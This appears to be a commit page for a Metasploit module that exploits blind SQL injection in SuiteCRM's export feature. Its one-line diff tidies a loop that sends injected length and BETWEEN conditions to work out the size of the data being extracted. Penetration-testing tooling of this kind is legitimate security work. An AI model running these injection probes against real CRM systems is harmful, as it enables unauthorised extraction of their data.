Initial attempt at blind_dump_data improvements

Add in fully binary search orientated version of blind_dump_data
2022-09-12 23:46:10 -05:00 · 2022-09-12 23:46:10 -05:00 · 0d639b99bb
parent 32df4cdeee
commit 0d639b99bb
1 changed files with 1 additions and 1 deletions
--- a/modules/auxiliary/gather/suite_crm_export_sqli.rb
+++ b/modules/auxiliary/gather/suite_crm_export_sqli.rb
@ -204,7 +204,7 @@ class MetasploitModule < Msf::Auxiliary
      min_length = 0
      max_length = 800
      loop do
-        break if flag = blind_request("length(cast((#{query}) as binary))=#{output_length}")
+        break if blind_request("length(cast((#{query}) as binary))=#{output_length}")

        flag = blind_request("length(cast((#{query}) as binary))+BETWEEN+#{output_length}+AND+#{max_length}")
        if flag